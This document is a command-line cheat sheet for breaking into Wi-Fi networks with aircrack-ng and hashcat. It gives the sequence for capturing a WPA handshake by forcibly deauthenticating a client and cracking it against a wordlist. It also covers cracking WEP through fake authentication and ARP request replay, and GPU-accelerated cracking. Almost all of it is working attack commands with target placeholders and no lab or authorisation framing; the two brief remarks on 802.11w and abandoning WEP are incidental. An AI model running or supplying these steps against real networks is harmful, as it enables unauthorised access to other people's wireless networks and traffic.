- # List the wireless interfaces known to airmon-ng
- airmon-ng
- # Put wlan0 into monitor mode
- airmon-ng start wlan0
- # Optional: start monitor mode fixed to a specific channel (9 here)
- airmon-ng start wlan0 9
- # A new monitor-mode device (mon0 in the commands below) shows up in iwconfig; note its name and use it
- iwconfig
- # Show the surrounding Wi-Fi networks
- airodump-ng mon0
- # Find the target with data and clients, note its channel, BSSID and SSID; -w writes the capture to files named filename*
- airodump-ng -c 9 --bssid 00:00:00:00:00:00 -w filename mon0
- # For WPA, a client is deauthenticated so that its handshake is captured when it reconnects;
- # -a is the BSSID of the router, -c is the client/target. Clients using 802.11w protected management frames discard such forged deauths
- aireplay-ng -0 1 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 mon0
- # Now run the offline wordlist attack on the capture, -b is the router BSSID; it only succeeds if the passphrase is in password.lst
- aircrack-ng -w password.lst -b 00:00:00:00:00:00 filename*.cap
- # For WEP, first run the injection test (-9):
- # -e is the SSID name, -a is the target BSSID
- aireplay-ng -9 -e targetSSID -a 00:14:6C:7E:40:80 mon9
- # The last line of output should show 100% or a very high percentage,
- # otherwise you are too far away
- # Start airodump-ng as above
- airodump-ng -c 9 --bssid 00:00:00:00:00:00 -w filename mon0
- # Start the fake authentication attack
- aireplay-ng -1 0 -e targetSSID -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
- # (for the command above) -a is the target BSSID, -h is our MAC address
- # Variation if that doesn't work
- aireplay-ng -1 6000 -o 1 -q 10 -e targetSSID -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
- # Replay the ARP request
- # -b is the target BSSID, -h is our MAC address
- aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
- # And crack it, -b is the target BSSID; WEP falls to this whatever the key is, so the only mitigation is moving off WEP
- aircrack-ng -b 00:14:6C:7E:40:80 filename*.cap
- # Ways to speed up the cracking:
- # cuda - NVIDIA
- # ocl - ATI
- # hashcat - Windows
- aircrack-ng filename.cap -J filename.hccap
- hashcat64.exe -m 2500 filename.hccap dictionary.lst